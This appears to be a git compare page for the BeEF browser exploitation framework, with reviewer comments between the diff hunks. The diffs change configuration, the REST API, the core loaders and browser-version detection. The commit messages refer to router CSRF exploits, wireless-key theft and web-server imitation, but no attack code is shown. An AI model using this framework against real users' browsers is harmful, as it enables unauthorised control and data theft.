Compare commits


129 Commits

Author SHA1 Message Date
bcoles
05deaaa8b5 Added Module: ActiveX Command Execution 2012-04-27 14:15:52 +09:30
bcoles
75cf67a6c4 Re-categorized some modules
Fixed a couple of typos
2012-04-27 10:35:17 +09:30
bcoles
d3005850d7 Updated supported browser list for several modules
Added a few hostnames to the DNS Enumeration modules
2012-04-26 20:07:45 +09:30
bcoles
a8e3d125d4 Added Module: Get Chrome Extensions
Fixes issue #660
2012-04-26 19:10:16 +09:30
Wade Alcorn
73bd6ab624 Added boilerplate to files with missing boilerplate 2012-04-24 18:00:15 +10:00
bcoles
923921b92b Added skeleton for custom hooks
Part of issue #101
2012-04-23 19:33:19 +09:30
bcoles
fa59e633b0 Popunder window now loads a plain page 2012-04-23 17:36:25 +09:30
bcoles
b5b5f0cd1a Fixed bug in IE version detection 2012-04-23 14:44:03 +09:30
antisnatchor
37c5edf2c2 Added strict doctype for /demos/basic.html page 2012-04-22 13:23:48 +01:00
antisnatchor
6cb8eb68fe Fixed bug on IE9 detection 2012-04-22 13:17:55 +01:00
antisnatchor
9835b0907d Merge branch 'master' of https://github.com/beefproject/beef 2012-04-20 14:47:45 +01:00
antisnatchor
f63240d3cb Added /api/hooks/:session RESTful api call in order to retrieve the full BrowserDetails for the hooked browser. 2012-04-20 14:46:46 +01:00
antisnatchor
5a345abfab Added print_info when unmounting a url (assethandler) 2012-04-20 14:08:08 +01:00
bcoles
a6b338e6c4 Added timeout variable declaration to get_internal_ip module 2012-04-20 22:34:34 +09:30
antisnatchor
217edee831 Added get_internal_ip module (uses an unsigned applet). Fix issue 576 2012-04-20 13:59:58 +01:00
antisnatchor
f8cd395e21 Added additional check on pathname for XssRays Issue 657 2012-04-20 11:40:28 +01:00
antisnatchor
f697e92c95 Decreased default XssRays iframe removal timeout, enhanced comments 2012-04-19 18:10:17 +01:00
antisnatchor
de68a00c75 Fix issue 658: removed content-type response header when replying to a successfully found Ray vector 2012-04-19 18:09:17 +01:00
antisnatchor
cf3587e2b1 Fix issue 657: the damn IE doesn't contain a forward slash on pathname 2012-04-19 18:08:16 +01:00
antisnatchor
d1e23c2084 Updated admin_ui and console extensions code to reflect the move of initialization extension into the core. 2012-04-18 14:37:44 +01:00
antisnatchor
cd4fce7887 Moved initialization extension into the core. BrowserDetails are a vital component of BeEF. There is no reason not to have it in the core. 2012-04-18 12:54:48 +01:00
antisnatchor
8a3fadb5f8 removed test jenkins line 2012-04-18 12:04:37 +01:00
antisnatchor
6f57d563ea Jenkins test 2012-04-16 18:02:42 +01:00
antisnatchor
66dbf871f1 Added test for test_network_request using the API. 2012-04-15 15:09:26 +01:00
antisnatchor
54e244013b Removed response= variable from test_network_request module response. Not needed. 2012-04-15 15:08:42 +01:00
antisnatchor
8f05a403ee Added Test_return_ascii_chars Debug module test using the API. 2012-04-15 13:45:24 +01:00
antisnatchor
98807ae9a3 Added RESTful API tests for /api/auth, /api/hooks, /api/modules. Added Test_return_long_string Debug module test using the API :D 2012-04-15 13:22:35 +01:00
antisnatchor
3ebe44732b Added beef.module.key.class to /api/module JSON response. 2012-04-15 12:54:04 +01:00
antisnatchor
8feef887b9 Fixed issue with malformed JSON response (missing }). Now using hash.to_json to send response. 2012-04-15 11:56:00 +01:00
antisnatchor
364575592a Moved BeEF credentials from admin_ui extension to the main config.yaml. Updated both admin_ui and RESTful API to reflect the changes. 2012-04-15 10:53:08 +01:00
Christian Frichot
49af6ad443 Merge branch 'RESTenhance' 2012-04-15 16:44:05 +08:00
Christian Frichot
79a7dd3e88 RESTful Admin API Class now includes a LOGIN method 2012-04-15 16:38:38 +08:00
Christian Frichot
321a63b148 Placeholder admin RESTful API class 2012-04-15 07:24:56 +08:00
Christian Frichot
44e9871503 RESTful API now obeys permitted_ui_subnet 2012-04-15 07:24:17 +08:00
bcoles
e52b5101ee Updated logo location
The favicon is not located at /favicon.ico if web server imitation is enabled
2012-04-12 17:20:20 +09:30
bcoles
0c0027e06f Event Logger now logs form submissions
Fixes issue #141
2012-04-12 12:27:28 +09:30
bcoles
6af55c7e33 Event Logger now logs clipboard events (in IE6 only)
Fixes issue #653

Tidied up the 'submit' handler a bit. Part of issue #141
2012-04-11 14:06:56 +09:30
antisnatchor
2b77416226 Issue 654: the main hook handler now extends the Router class 2012-04-09 12:26:57 +01:00
antisnatchor
dd2e522ce4 Issue 654: the XssRays handler is now extending the Router class 2012-04-09 11:36:35 +01:00
antisnatchor
22772c7822 Issue 654: the RESTful api classes are now extending the Router class 2012-04-09 11:16:21 +01:00
antisnatchor
8cac63a2f0 Issue 654: if /dh handler is called without params, return 404 2012-04-09 11:03:02 +01:00
antisnatchor
c60825faae Issue 654: adjusted DynamicReconstruction handler to extend the Router class 2012-04-09 10:33:23 +01:00
Wade Alcorn
3d80a952ae Version number updated 2012-04-08 16:07:22 +10:00
bcoles
cce8cf451c Added XssRays vectors:
o URL encoded
o Double URL encoded
o Double nibble URL encoded

Fixes issue #65

Part of issue #47
2012-04-05 14:26:30 +09:30
bcoles
f852b87b2b Added detection for Chrome 18 and 19 2012-04-05 12:45:10 +09:30
Michele Orru
4e1a283736 Merge pull request #656 from tmacuk/master
Added IIS imitation default root page, thanks to @tmacuk
2012-04-04 13:33:23 -07:00
Thomas Mackenzie
e168a05936 added pageerror logo for iis imitation 2012-04-04 20:04:31 +01:00
Thomas Mackenzie
e76f301593 added iis imitation construction page 2012-04-04 18:39:56 +01:00
antisnatchor
67d024441d Added Apache/Centos images for the default root page (web server imitation) 2012-04-04 16:45:39 +01:00
antisnatchor
616b969f96 added todo for IIS 6 default root page (web server imitation) 2012-04-04 16:42:42 +01:00
antisnatchor
0067e20702 Changed HTTP response 'server' header to IIS/6 when iis is specified. 2012-04-04 16:41:15 +01:00
antisnatchor
870a182411 Added HTTP response with default Apache centos root page (web server imitation). 2012-04-04 16:33:32 +01:00
antisnatchor
f5a77a63eb Prevent mounting favicon.ico if we're imitating a web server. 2012-04-04 16:06:19 +01:00
antisnatchor
454280f7de Adjusted errors and default returns for the web server imitation. 2012-04-04 16:05:52 +01:00
antisnatchor
6bebb80f61 Added default 404 HTTP response bodies for Apache 2.2.3 and IIS 6 2012-04-04 15:47:21 +01:00
Keith Lee
e528375e3d Save wireless configuration xml created by Get_wireless_keys module to temp folder 2012-04-02 14:40:32 -04:00
antisnatchor
1db9ccaff6 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-31 14:12:52 +01:00
antisnatchor
2db4885c2f Added comments in the main Router class. 2012-03-31 13:57:18 +01:00
antisnatchor
5474f0507a Allowing also GET method on Access-Control-Allow-Methods (dynamic handler). 2012-03-31 13:27:59 +01:00
antisnatchor
59ac216b71 Added basic web-server imitation (overriding Server response headers, added config.yaml options). 2012-03-31 13:24:30 +01:00
antisnatchor
addc256b8c Remove route "/" from the main router class. Must return 'not found' anyway. 2012-03-29 15:00:20 +02:00
antisnatchor
b88acd98c8 Added BeEF router superclass: it will be extended by other classes when sub-routes are needed. 2012-03-29 14:24:15 +02:00
bcoles
2bca21a41d Minor updates to XSSRays
Part of issue #47
2012-03-26 16:29:15 +10:30
bcoles
8518c8fae9 Renamed History Extraction module to Get Visited Domains
Added 4 links for Firefox
2012-03-26 14:44:36 +10:30
bcoles
b230b98336 Changed BeEF::API.registered?() to use the :is_matched_params method
Fixes issue #500
2012-03-25 14:13:44 +10:30
antisnatchor
e4a7019192 Merge branch 'master' of https://github.com/beefproject/beef 2012-03-24 18:43:57 +01:00
bcoles
45475d625b Updated IE version detection
No longer modifies the DOM for every call to:
- `isIE8()`
- `isIE9()`
- `isIE()`
2012-03-22 19:27:36 +10:30
antisnatchor
f0fab1c431 Added rest-client gem dependency when running tests 2012-03-16 11:12:10 +01:00
bcoles
5329d5c147 Added support for Firefox 11 2012-03-16 13:11:20 +10:30
bcoles
e52779e72e Fixed javaEnabled() in BeEF hook
- It was breaking the hook in IE6

Also fixed a couple of typos in the Local File Theft module description
2012-03-16 12:40:13 +10:30
antisnatchor
5e2de7d378 reverted http.debug to false 2012-03-15 18:37:53 +01:00
Michele Orru
11fbeb3296 Merge pull request #643 from antisnatchor/master
RESTful API, from antisnatchor with love :D
2012-03-15 10:33:17 -07:00
antisnatchor
99fff273fe removed old reference to dynamic_module table 2012-03-15 13:58:37 +01:00
antisnatchor
61efe56b10 Removed classes and requires of dynamic* tables. Not used anymore. 2012-03-15 13:56:48 +01:00
antisnatchor
4e224e63ee added example on how to call metasploit modules with the REST api 2012-03-15 13:53:29 +01:00
antisnatchor
5c96fe2b84 changed return value on override_execute, reformatted code for the metasploit api 2012-03-15 13:32:10 +01:00
Christian Frichot
6541d9fa34 Tidied up some of the Console Shell output handling - Issue #642 2012-03-15 19:52:03 +08:00
Christian Frichot
2bc6a0d8a9 Rick roll module, changed to a different YouTube vid, that appears to work here. Issue #620 2012-03-15 19:43:02 +08:00
Christian Frichot
4f1042a6a3 QRCode extension - minor update to handle the Console in the Core - Issue #641 2012-03-15 19:39:24 +08:00
antisnatchor
8db7ef00b4 Fixed error when attaching to MSF (resetdb? is not there anymore) 2012-03-15 12:25:38 +01:00
antisnatchor
fec922a63c Implemented /api/modules/ to retrieve all enabled modules 2012-03-14 16:52:25 +01:00
antisnatchor
8fdd127f17 Disabled Sinatra exception, and set the custom 404 response to 'not found.' 2012-03-14 16:26:29 +01:00
Graziano Felline
b02bdbaaa7 ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:41:10 +01:00
Graziano Felline
8795c5770a ISSUE 625 - corrected the bug. Added li's elements poison 2012-03-14 15:34:46 +01:00
antisnatchor
c3a611d12e Implemented info/options retrieval for a specific module through the REST API 2012-03-13 17:18:13 +01:00
antisnatchor
434f9f8e43 Now it's possible to launch command modules via the REST api (also with options), and then get execution results. 2012-03-13 12:43:10 +01:00
antisnatchor
837c1f2db8 Modified BeEF::Module.execute to return the command_id of the persisted command, instead of just returning a boolean. Refactored usages in the code as well. 2012-03-13 12:40:28 +01:00
antisnatchor
3674f06609 Implemented /api/logs and /api/logs/hb_session, added code comments 2012-03-12 17:40:38 +01:00
antisnatchor
818f3d207e Retrieving correct browser version with browserDetails BrowserVersion 2012-03-12 17:14:09 +01:00
bcoles
b11502cc84 Added BT Home Hub CSRF module 2012-03-13 00:54:25 +10:30
bcoles
f38c7e5615 Removed "HasJava" from hook initialization
Updated Get Wireless Keys module description
2012-03-13 00:50:03 +10:30
bcoles
6ef889b0b1 Removed Java from hook initialization:
- Removed has_java
- Removed internal_ip
- Removed internal_hostname

Added function `beef.browser.javaEnabled()`

Patched function `beef.browser.hasJava()`
- should no longer break the hook in Chrome/Safari

Added `not_working` browsers to History Extraction module
2012-03-13 00:19:01 +10:30
antisnatchor
4429ab3df2 Added /api/hooks logic to retrieve online and offline HBs as json 2012-03-12 12:46:04 +01:00
antisnatchor
03cd06a014 Added stubs and registered classes for the 3 main RESTful API endpoints: hooks, modules, logs 2012-03-12 11:55:26 +01:00
antisnatchor
872272645e Added api_token for RESTful api authentication 2012-03-12 10:27:03 +01:00
bcoles
9735a7b66f Merge branch 'master' of https://github.com/beefproject/beef 2012-03-12 11:41:08 +10:30
milo2012
51d6aaa515 Merge remote-tracking branch 'origin/master' 2012-03-12 00:53:07 +08:00
milo2012
5cb1ad3d53 Module for Issue 639 - Retrieving Clear Text Wireless Keys from Compromised Systems 2012-03-12 00:50:02 +08:00
milo2012
daa37293fe Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:57:19 -04:00
root
847b798e0a Fix Issue 88 - Working for IE and Firefox 2012-03-11 11:40:10 -04:00
antisnatchor
7dab21ff7f First skeleton for the RESTful api using Sinatra (modular approach, not classic one). 2012-03-11 16:12:59 +01:00
antisnatchor
e1652bf52e Added sinatra dependency to bundler Gemfile 2012-03-11 10:51:43 +01:00
radoen
a0c11fa695 Added support to intercept dynamic requests 2012-03-11 10:26:56 +01:00
Keith Lee
f2401d3f39 Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. 2012-03-11 10:26:56 +01:00
asaafan
76e881dce9 Delete Skype XSS stub from main branch 2012-03-11 10:26:56 +01:00
unknown
ea199f5c55 Adding stub for Skype XSS module 2012-03-11 10:26:56 +01:00
asaafan
05b7eab56c Delete Skype XSS stub from main branch 2012-03-09 01:46:11 +02:00
bcoles
11870710e8 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-08 20:28:38 +01:00
unknown
dbd6baa7b0 Temporary fix to prevent hook error on Safari. I will implement a final fix tomorrow. 2012-03-07 16:19:06 +01:00
bcoles
c1975691f4 Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 2012-03-07 15:02:12 +10:30
antisnatchor
8c3afcf2b9 Minor changes related to Java detection with the unsigned applet: if the browser is Chrome, we simply rely on window.navigator. 2012-03-06 19:56:58 +01:00
Michele Orru
03604a7e93 Merge pull request #632 from milo2012/master
Fixes Issue 567: if browser != Chrome, an unsigned java applet is injected in the DOM to verify if Java is really enabled and working.
2012-03-06 10:44:34 -08:00
Keith Lee
cc9756cf59 Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:46:51 +08:00
Keith Lee
97672966df Fix for issues 567 and also remove multiple calls to beef.browser.hasJava() from /beef/core/main/client/net/local.js 2012-03-07 01:41:27 +08:00
Saafan
3bd06ebf82 Merge pull request #631 from asaafan/master
Testing Fork/Merge
2012-03-05 07:51:04 -08:00
Saafan
c1ad9d7b04 Testing fork/merge 2012-03-05 17:47:14 +02:00
Michele Orru
2796e384b3 Merge pull request #630 from milo2012/master
changes to command.rb and commands.rb so that @datastore['cid'], @datastore['results'] and @datastore['beefhook'] can be called from the modules
2012-03-05 01:37:19 -08:00
Keith Lee
95f7e92011 Changes to command module and get_physical location so that @datastore['cid'], @datastore['results'] and @datastore['beefhook'] can be called from the modules 2012-03-05 03:40:46 +08:00
antisnatchor
698e01bb83 reverted back test_contants definition. 2012-03-04 16:36:08 +01:00
antisnatchor
08d50512e9 Added bootstrap unit tests. 2012-03-04 16:22:37 +01:00
antisnatchor
e9a6049e58 Fixes issue 621: Added 2 new command line options. Now it's possible to specify a different config.yaml file. Also changed the core load order, adding a new bootstrap module. 2012-03-04 14:55:03 +01:00
Wade Alcorn
3f06f6db18 Commented yaml bug fix 2012-03-04 22:12:04 +10:00
Wade Alcorn
487227b945 Version updated 2012-03-04 22:11:21 +10:00
Wade Alcorn
6c7624805c Update delay to test jenkins 2012-03-04 21:46:03 +10:00
bcoles
753299e758 Updated Get Page HTML module:
o Now returns head and body in one beef.send() request
o Now stores results correctly
2012-03-04 20:24:04 +10:30
bcoles
0485a1ab7e Added 3x router CSRF exploits:
o Comtrend CT5367
o Comtrend CT5624
o D-Link DSL500T
2012-03-04 14:55:00 +10:30
Christian Frichot
52d06e40a2 Removed the dev/null output in the Rake Install task Issue #629 2012-03-03 22:44:05 +08:00
bcoles
5c678a2550 Added cleanup() function to router exploits
Removed `username:password@` portion of example target URLs as
unfortunately this triggers warnings in most modern browsers. The
modules target CSRF vulnerabilities and it's expected and
acceptable behaviour to rely on the user having an authorized session by
default.

"Advanced users" will be familiar with the `username:password@` trick
and can add it to the URL if they desire.
2012-03-03 20:43:56 +10:30
Christian Frichot
63805d943d The Console Shell now allows you to drop into an IRB (and then play with the BeEF object if you want) Issue #627 2012-03-03 14:59:59 +08:00
214 changed files with 5131 additions and 958 deletions

.gitignore

@@ -1,2 +1,3 @@
beef.db
test/msf-test
custom-config.yaml
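Review bot: custom-config.yaml is ignored here, but the default config.yaml, which in this same change gains a `credentials:` block with a username and password, is still a tracked file; an operator who edits it in place will commit their credentials. Suggest stating in the README that a private file passed with -c is the supported way to set credentials, or tracking a config.yaml.example instead and ignoring config.yaml itself.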


@@ -25,6 +25,7 @@ else
end
gem "thin"
gem "sinatra", "1.3.2"
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
@@ -48,6 +49,8 @@ if ENV['BEEF_TEST']
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
#RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
end
source "http://rubygems.org"
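Review bot: `source "http://rubygems.org"` fetches every gem over plain HTTP, so anything on the network path can substitute a package at install time; switch the source to https://rubygems.org. The `"~> 1.6.7"` constraint on rest-client is appropriate for a test-only dependency, and the comment above it should mention that the tests need a running BeEF instance if that is the case.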


@@ -1,52 +0,0 @@
GEM
remote: http://rubygems.org/
specs:
addressable (2.2.6)
ansi (1.4.1)
daemons (1.1.5)
data_objects (0.10.7)
addressable (~> 2.1)
dm-core (1.2.0)
addressable (~> 2.2.6)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.7)
data_objects (= 0.10.7)
erubis (2.7.0)
eventmachine (0.12.10)
json (1.6.4)
librex (0.0.52)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.4.6)
parseconfig (0.5.2)
rack (1.4.0)
term-ansicolor (1.0.7)
thin (1.3.1)
daemons (>= 1.0.9)
eventmachine (>= 0.12.6)
rack (>= 1.0.0)
PLATFORMS
ruby
DEPENDENCIES
ansi
data_objects
dm-core
dm-migrations
dm-sqlite-adapter
erubis
eventmachine (= 0.12.10)
json
msfrpc-client
parseconfig
term-ansicolor
thin
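Review bot: deleting Gemfile.lock throws away the resolved dependency graph (msfrpc-client 1.0.1, librex 0.0.52, dm-core 1.2.0, thin 1.3.1 and the rest listed here), so each `bundle install` now resolves whatever newest versions satisfy the loose constraints in the Gemfile; builds stop being reproducible and a newly published gem version is picked up silently. If the lock was removed because the test group varies per environment, prefer regenerating and committing it, or at least record the reason in the commit message.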


@@ -56,7 +56,7 @@ task :msf => ["install", "msf_install"] do
end
task :install do
sh "export BEEF_TEST=true;bundle install > /dev/null"
sh "export BEEF_TEST=true;bundle install"
end
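Review bot: dropping the `> /dev/null` redirect is right, since it was hiding bundler's error output during install (Issue #629). The `export BEEF_TEST=true;bundle install` string spawns a shell only to set one variable; `sh "BEEF_TEST=true bundle install"` does the same in plain POSIX form and is easier to read.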
################################


@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.2-alpha
0.4.3.4-alpha

beef

@@ -41,15 +41,26 @@ end
# @note Require core loader's
require 'core/loader'
# @note Starts configuration system
config = BeEF::Core::Configuration.instance
# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
require 'core/bootstrap'
# @note Loads enabled extensions
BeEF::Extensions.load
# @note Prints the BeEF ascii art if the -a flag was passed
if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
BeEF::Core::Console::Banners.print_ascii_art
end
# @note Prints BeEF welcome message
#BeEF::Extension::Console::Banners.print_ascii_art
BeEF::Extension::Console::Banners.print_welcome_msg
BeEF::Core::Console::Banners.print_welcome_msg
# @note Loads enabled modules
BeEF::Modules.load
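Review bot: the -c value is interpolated as `"#{$root_dir}/#{...}"`, so an absolute path such as `-c /etc/beef/config.yaml` becomes `$root_dir//etc/beef/config.yaml` and does not load; resolve it with `File.expand_path(ext_config, $root_dir)` and fail early with a clear message when the file does not exist. `BeEF::Core::Console::CommandLine.parse` is also called three times in this hunk (for `:ext_config` twice and `:ascii_art` once); parse once into a local and reuse the result.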
@@ -75,8 +86,7 @@ case config.get("beef.database.driver")
end
# @note Resets the database if the -x flag was passed
# @todo Change reference from Extension::Console to Core::Console once the console extension is merged with the core
if BeEF::Extension::Console.resetdb?
if BeEF::Core::Console::CommandLine.parse[:resetdb]
print_info 'Resetting the database for BeEF.'
DataMapper.auto_migrate!
else
@@ -94,10 +104,13 @@ http_hook_server = BeEF::Core::Server.instance
http_hook_server.prepare
# @note Prints information back to the user before running the server
BeEF::Extension::Console::Banners.print_loaded_extensions
BeEF::Extension::Console::Banners.print_loaded_modules
BeEF::Extension::Console::Banners.print_network_interfaces_count
BeEF::Extension::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
#@note Prints the API key needed to use the RESTful API
print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
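Review bot: `print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"` writes the bearer token for the RESTful API to standard output on every start, so it lands in any captured console output (the Jenkins runs added in this range, terminal scrollback, daemon logs). Consider printing it only on request or under debug, and note in the config comments that the key is a credential equivalent to the admin password.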


@@ -16,14 +16,14 @@
# BeEF Configuration file
beef:
version: '0.4.3.2-alpha'
version: '0.4.3.4-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet = "127.0.0.1/32"
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
@@ -37,6 +37,10 @@ beef:
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
type: "apache" #supported: apache, iis
database:
# For information on using other databases please read the
@@ -55,6 +59,11 @@ beef:
db_passwd: "beef123"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
crypto_default_value_length: 80
# You may override default extension configuration parameters here
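Review bot: `user: "beef"` / `passwd: "beef"` are default credentials that now protect both the admin UI and the RESTful API, and they ship in a tracked config.yaml with the UI subnet open to all addresses by default. Suggest warning loudly at startup (or refusing to bind on a non-loopback address) while the shipped defaults are unchanged, and pointing operators to the new -c option for a private config file.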


@@ -60,10 +60,9 @@ module BeEF
# @param [String] method the method of the class
# @param [Array] params an array of parameters that need to be matched
# @return [Boolean] whether or not the owner is registered
# @todo Change the param matching to use the new :is_matched_params?() method - Issue #479
def registered?(owner, c, method, params = [])
@registry.each{|r|
if r['owner'] == owner and r['class'] == c and r['method'] == method and params == r['params']
if r['owner'] == owner and r['class'] == c and r['method'] == method and self.is_matched_params?(r, params)
return true
end
}
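Review bot: the @todo comment removed here refers to Issue #479 while the commit message says "Fixes issue #500"; make sure the right issue is closed. If `is_matched_params?` is a private method, the explicit receiver in `self.is_matched_params?(r, params)` raises NoMethodError on Ruby 1.9, so call it without `self.`.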

core/bootstrap.rb (new file)

@@ -0,0 +1,55 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
end
end
## @note Include the BeEF router
require 'core/main/router/router'
require 'core/main/router/api'
## @note Include http server functions for beef
require 'core/main/server'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'
## @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/api'
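Review bot: the header carries the licence but nothing about what "bootstrap" loads that core/core.rb does not, nor that core/core.rb must already be loaded; add a short comment stating that contract and that `core/main/router/router` has to come first because the handler and REST classes extend the Router class. The empty `module BeEF; module Core; end; end` is a no-op when core/core.rb has already defined those modules and can be dropped.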


@@ -26,10 +26,8 @@ require 'core/main/models/hookedbrowser'
require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/dynamiccommandinfo'
require 'core/main/models/dynamicpayloadinfo'
require 'core/main/models/dynamicpayloads'
require 'core/main/models/optioncache'
require 'core/main/models/browserdetails'
# @note Include the constants
require 'core/main/constants/browsers'
@@ -44,20 +42,8 @@ require 'core/main/crypto'
require 'core/main/logger'
require 'core/main/migration'
# @note Include http server functions for beef
require 'core/main/server'
# @note Include the command line parser and the banner printer
require 'core/main/console/commandline'
require 'core/main/console/banners'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'


@@ -38,11 +38,4 @@ require 'core/api'
require 'core/settings'
# @note Include the core of BeEF
require 'core/core'
# @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
require 'core/core'


@@ -48,9 +48,8 @@ beef.browser = {
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function() {
$j("body").append('<!--[if IE 8]> <div id="beefiecheck" class="ie ie8"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie8'))?true:false;
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
@@ -58,8 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
$j("body").append('<!--[if IE 9]> <div id="beefiecheck" class="ie ie9"></div> <![endif]-->');
return ($j('#beefiecheck').hasClass('ie9'))?true:false;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
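Review bot: `isIE9` has no upper bound: it returns true for any browser that exposes XDomainRequest together with window.performance, so a later IE release that keeps XDomainRequest is reported as IE9 (and `isIE8` likewise keys on the absence of window.performance rather than the version). Both checks already require `document.documentMode`, so compare it directly (`document.documentMode == 8` / `== 9`) for an exact match.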
/**
@@ -158,12 +156,28 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12();
},
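Review bot: `isFF11` and `isFF12` repeat the same user-agent regex with only the number changed, and `isFF` grows by one term per release; a single helper that matches `/Firefox\/(\d+)\./` once and returns the number would serve these checks and the version table further down. The user-agent string is client-controlled, so these remain hints rather than verification.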
/**
@@ -294,12 +308,28 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome 18.
* @example: beef.browser.isC18()
*/
isC18: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
},
/**
* Returns true if Chrome 19.
* @example: beef.browser.isC19()
*/
isC19: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
},
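Review bot: `window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1]` throws a TypeError when `window.chrome` exists but appVersion does not contain `Chrome/` (a modified UA string), and that exception propagates out of `isC18`, `isC19` and `isC`; capture the match result first and return false when it is null. As with the Firefox checks, one version extraction would replace the per-version copies.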
/**
@@ -363,7 +393,9 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
